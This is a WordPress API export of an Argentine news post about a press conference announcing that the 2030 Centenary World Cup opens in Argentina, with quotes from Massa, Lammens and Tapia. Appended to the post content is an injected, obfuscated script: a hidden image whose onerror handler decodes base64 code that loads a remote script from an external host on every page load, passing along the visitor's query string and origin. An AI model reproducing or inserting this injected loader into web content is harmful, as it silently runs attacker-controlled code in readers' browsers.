{"id":14562,"date":"2023-10-05T17:07:14","date_gmt":"2023-10-05T20:07:14","guid":{"rendered":"https:\/\/nubesmgzdigital.com.ar\/?p=14562"},"modified":"2025-08-13T16:08:06","modified_gmt":"2025-08-13T19:08:06","slug":"el-mundial-centenario-2030-comienza-en-argentina","status":"publish","type":"post","link":"https:\/\/nubesmgzdigital.com.ar\/index.php\/2023\/10\/05\/el-mundial-centenario-2030-comienza-en-argentina\/","title":{"rendered":"El Mundial Centenario 2030 comienza en Argentina"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\">Conferencia de prensa de Massa, Lammens y Tapia con detalles del anuncio.<\/h5>\n\n\n\n<p>El ministro de Econom\u00eda de la Naci\u00f3n,&nbsp;<strong>Sergio Massa<\/strong>; su par de Turismo y Deportes,&nbsp;<strong>Mat\u00edas Lammens<\/strong>; y el presidente de la Asociaci\u00f3n del F\u00fatbol Argentino,&nbsp;<strong>Claudio Tapia<\/strong>, brindaron una conferencia de prensa sobre la organizaci\u00f3n del&nbsp;<strong>Mundial Centenario 2030<\/strong>, en el que Argentina, Uruguay y Paraguay ser\u00e1n los escenarios de los partidos inaugurales del certamen.<\/p>\n\n\n\n<p>\u201c<em>Siento un enorme orgullo por el f\u00fatbol argentino, uno de los s\u00edmbolos y de las banderas m\u00e1s importantes que nuestro pa\u00eds tiene a lo largo y ancho del mundo. Junto a Uruguay y Paraguay vamos a recibir el Mundial Centenario en nuestra casa<\/em>\u201d, asegur\u00f3 el ministro&nbsp;<strong>Massa<\/strong>&nbsp;desde el Predio Deportivo Lionel Andr\u00e9s Messi. Y agreg\u00f3: \u201c<em>Agradecemos el enorme trabajo de AFA y CONMEBOL porque en 2030, gobierne quien gobierne, el Mundial empieza en Argentina. Tal como lo hicimos con el Mundial Sub-20, vamos a recibir a miles de turistas y demostrar que podemos ocupar un lugar de preponderancia en el mundo<\/em>\u201d.<\/p>\n\n\n\n<p>Por su parte, el ministro&nbsp;<strong>Lammens<\/strong>&nbsp;declar\u00f3: \u201c<em>Es un d\u00eda muy importante porque refleja el punto c\u00falmine de mucho tiempo de trabajo conjunto. Este partido inaugural va a poner a la Argentina y a Sudam\u00e9rica en el ojo del mundo, con todo lo que eso representa en t\u00e9rminos futbol\u00edsticos pero tambi\u00e9n de oportunidades<\/em>\u201d.<\/p>\n\n\n\n<p>Inicialmente,&nbsp;<strong>Tapia<\/strong>&nbsp;afirm\u00f3: \u201c<em>Hemos tenido la posibilidad de cumplir un sue\u00f1o que inici\u00f3 hace un tiempo, que es el de jugar este Mundial en Sudam\u00e9rica. No solo pusimos de pie nuevamente a esta Asociaci\u00f3n, sino que adem\u00e1s, nuestros jugadores y nuestros t\u00e9cnicos han conseguido los objetivos m\u00e1s importantes. Este Mundial tiene un valor patri\u00f3tico para la Argentina. No es un Mundial de la dictadura, gobierne quien gobierne, va a ser un Mundial de la Democracia<\/em>&#8220;.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"738\" data-id=\"14563\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-1024x738.jpg\" alt=\"\" class=\"wp-image-14563\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-1024x738.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-300x216.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-768x553.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-324x235.jpg 324w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-696x501.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-1068x769.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977-583x420.jpg 583w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255977.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"737\" data-id=\"14565\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976-1024x737.jpg\" alt=\"\" class=\"wp-image-14565\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976-1024x737.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976-300x216.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976-768x553.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976-696x501.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976-1068x768.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976-584x420.jpg 584w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255976.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"738\" data-id=\"14564\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-1024x738.jpg\" alt=\"\" class=\"wp-image-14564\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-1024x738.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-300x216.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-768x553.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-324x235.jpg 324w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-696x501.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-1068x769.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978-583x420.jpg 583w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000255978.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>El acto cont\u00f3 con la presencia de miembros del Comit\u00e9 Ejecutivo, dirigentes de todas las categor\u00edas del f\u00fatbol argentino y los medios de comunicaci\u00f3n acreditados.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Conferencia de prensa &quot;Mundial Centenario 2030&quot;\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/3FPwNamDhZI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Conferencia de prensa de Massa, Lammens y Tapia con detalles del anuncio. El ministro de Econom\u00eda de la Naci\u00f3n,&nbsp;Sergio Massa; su par de Turismo y Deportes,&nbsp;Mat\u00edas Lammens; y el presidente de la Asociaci\u00f3n del F\u00fatbol Argentino,&nbsp;Claudio Tapia, brindaron una conferencia de prensa sobre la organizaci\u00f3n del&nbsp;Mundial Centenario 2030, en el que Argentina, Uruguay y Paraguay [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":14566,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[113,111],"tags":[],"class_list":["post-14562","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacional","category-nacional"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=14562"}],"version-history":[{"count":2,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14562\/revisions"}],"predecessor-version":[{"id":19376,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14562\/revisions\/19376"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media\/14566"}],"wp:attachment":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=14562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/categories?post=14562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/tags?post=14562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}